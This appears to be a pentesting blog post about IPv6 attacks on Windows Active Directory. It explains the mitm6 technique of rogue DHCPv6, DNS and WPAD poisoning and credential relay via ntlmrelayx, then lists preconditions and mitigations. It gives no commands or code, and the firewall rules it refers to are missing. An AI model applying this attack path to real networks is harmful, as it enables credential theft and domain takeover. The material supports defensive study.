IPv6 Attacks
Intro to IPv6
Internet Protocol Version 6(IPv6) is the next generation of Internet protocol that provides an expanded addressing space to overcome the limitations of IPv4. While the people know about IPv4 limitations, they still didn't move to IPv6. Why because the depletion of available IPv4 addresses was patched with the use of Network Address Translation (NAT) because of this the urgency of adoption may be less compelling.
The arrival of NAT solves the problem of IPv4 address shortage, people didn't able to completely move on to IPv6. Some peoples use Dual-Stack Approach in which they use IPv4 and IPv6 addresses simultaneously. This approach allows for a gradual transition, but it adds complexity to network management and maintenance.
IPv6 Attack
IPv6 itself didn't have any vulnerabilities but any misconfiguration of IPv6 may open the doors for different types of attacks. Here are some examples of IPv6 Attacks that can Impact Windows Active Directory.
Neighbor Discovery Protocol (NDP) Attacks
Attackers can exploit vulnerabilities in NDP to perform attacks such as Router Advertisement (RA) spoofing, Neighbor Solicitation (NS) flooding, or Neighbor Cache Poisoning. These attacks can disrupt network connectivity, redirect traffic, or impersonate legitimate network devices, potentially impacting Active Directory communications.
Rogue Router Advertisements
Attackers can send rogue Router Advertisement (RA) messages on the network to trick Windows hosts into configuring incorrect or malicious IPv6 settings. This can lead to network connectivity issues, DNS hijacking, or man-in-the-middle attacks against Active Directory services.
Man-in-the-Middle (MITM) Attacks
IPv6 networks are susceptible to MITM attacks where attackers intercept and manipulate network traffic. By leveraging IPv6 capabilities, attackers can eavesdrop on Active Directory communications, capture sensitive information, or impersonate legitimate domain controllers or clients.
IPv6 Fragmentation Attacks
Attackers may use IPv6 fragmentation techniques to evade detection or bypass security controls. By splitting malicious payloads into multiple fragments, they can deliver malicious content to Windows hosts within the Active Directory environment, potentially leading to compromise or data exfiltration.
Denial-of-Service (DoS) Attacks
Attackers can launch IPv6-based DoS attacks against Windows Active Directory infrastructure by flooding the network with excessive IPv6 traffic. This can overload network devices, consume system resources, and disrupt normal Active Directory operations. This attack may not be well used but by the type of engagement and scenario, this attack still exists that can impact business.
All the Above mentioned attacks are available in the active directory and each one has its own way of exploitation to impact the business operations. To keep everything short and simple I showcase MITM attacks that are widely used in active directory pentesting and this attack could lead to full domain compromise.
MITMv6 or MITM6
As we discussed above IPv6 has its own version of a Man-in-the-Middle attack and there we discussed this attack could lead to capturing some sensitive information or impersonating legitimate domain controllers or clients. That's what we do here but before we start you may have a question if IPv6 isn't fully adopted yet we didn't see it often.
The answer is No, you see this attack very often because even Windows uses IPv4 but it has IPv6 enabled by default. Not only did Windows enable it by default but it also preferred IPv6 more than IPv4. This is the reason why this attack is very used to either get the Domain compromised, gain initial access, or get the user's password hashes that can be used for cracking purposes.
Now let's talk about the behind the scene of the MITM6 attack.
First we use the tool MITM6 that can be download and install from this link MITM6.
We start MITM6 server that act as IPv6 router that reply to any Dynamic Host Configuration Protocol(DHCP) request and assign him IPv6 address information that includes IP Address, Default Gateway, and DNS server just like IPv4 DHCP server.
Windows system uses DHCPv6 request for getting IPv6 address and MITM6 responds to that request and assigns attacker IP information in it so that every traffic passes through the Attacker system.
You may be asked why Windows send DHCP request to the attacker system. Well, when we start the MITMv6 server they act as an IPv6 router and they advertised themselves on the network to know other systems that the IPv6 router is present. Windows system periodically sends out IPv6 request packets in the local network seeking for IPv6 router and when they know about it they send DHCP request to our IPv6 router(MITMv6) and sync IP information provided by that router.
After the machines contain our provided IP information they redirect all the DNS requests to MITMv6 and those requests contain credentials of the user who is logged in.
MITM6 forward that credentials to another tool ntlmrelayx that can use that to automatically enumerate the whole domain and the privileges of the victim users for further exploitation. This happens in the case of normal users but if the victim user is an Administrator user then they do more nefarious stuff than the above.
Below are the things an attacker can achieve if the victim user is an Administrator.
Privilege Escalation: With administrator-level access, the attacker can escalate their privileges on the compromised system. This allows them to bypass restrictions, access sensitive files, execute commands with elevated privileges, and make changes to system configurations.
System Control: The attacker can take full control of the victim's system, installing, modifying, or removing software, creating user accounts, manipulating system settings, and executing arbitrary commands. They can effectively manipulate the compromised system as if they were the legitimate administrator.
Network Access: As an administrator, the victim user likely has access to various network resources and sensitive information. The attacker can leverage this access to gain further control over network devices, access confidential data, or move laterally within the network to compromise additional systems.
Active Directory Compromise: The attacker can use administrator privileges to target the Active Directory infrastructure. They can manipulate Active Directory objects, compromise domain controllers, create backdoors, modify group policies, or extract sensitive domain-related information.
Data Exfiltration: With administrator access, the attacker can exfiltrate sensitive data from the victim's system or the network. They may steal valuable intellectual property, financial information, personal data, or other confidential information that can be used for malicious purposes or sold on the black market.
Persistence: The attacker can establish persistence on the compromised system, ensuring continued access even if the initial compromise is detected or remediated. They can create hidden user accounts, install rootkits or backdoors, modify startup configurations, or deploy other techniques to maintain their presence on the system.
Privileged Attacks: With administrator privileges, the attacker can perform more sophisticated attacks, such as privilege escalation within the network, compromising other administrative accounts, manipulating security controls, or disabling security mechanisms to evade detection.
Limitations
All the above attack path is a dream scenario but in real life, you may face problems or may not get any success. To avoid those things and not fall for any rabbit hole I recommend you only try this attack if you are sure that the target system has the following things or services enabled.
IPv6 Enabled: The IPv6 is the main part of this attack and without that, this attack is not possible but as I said IPv6 is enabled by default so unless they are explicitly disabled this attack possible.
Active Directory Environment: Although is it a mandatory requirement to get a bigger attack surface and higher chances of success the target system should be an attack directory environment.
DNS Resolution: The above attack path we explained is based on DNS in which we poisoned the target system DNS settings to hijack his DNS queries so based on that target must perform a DNS query.
WPAD Vulnerability: The victim machine must be susceptible to the Web Proxy Auto-Discovery (WPAD) vulnerability. WPAD is used to automatically configure proxy settings on clients but can be abused by the attacker to redirect network traffic through their own malicious proxy server. The MITM6 uses WPAD protocol to redirect the victim to a malicious proxy server to monitor his web traffic although it is also not mandatory but having this lead to good results.
Victim's User Privileges: To gain the maximum benefit from the attack, the victim user should have administrative privileges on their system. This allows the attacker to escalate their own privileges, control the system, manipulate Active Directory, and potentially compromise other network resources.
Mitigation
This attack is mitigating in a variety of ways let's look into them.
Disable IPv6 Disabling IPv6 Completely stop this attack but if for any reason you don't want to stop IPv6 then the following firewall rules must be in place to stop this attack.
WPAD-related risk Although the above firewall rules controlled IPv6-related risks they will not help us to solve Web Proxy Auto Discovery-related risks. To solve that disable it from Group Policy and Disabling the
WinHttpAutoProxySvcservice.LDAP or LDAPS-related risk I didn't mention but the above attack also uses LDAP(S) to gain unauthorized access or to perform some other stuff. To mitigate that must enable LDAP signing (To protect him against impersonation) and LDAP binding.
Protected Users Administrator accounts are very sensitive and to protect them from these kinds of attacks in which attack can impersonate him, we can add Administrative Accounts or another sensitive account to the Protected Users Security Group. That way they were safe from impersonation attacks mentioned above.
Related Blogs & Articles
Last updated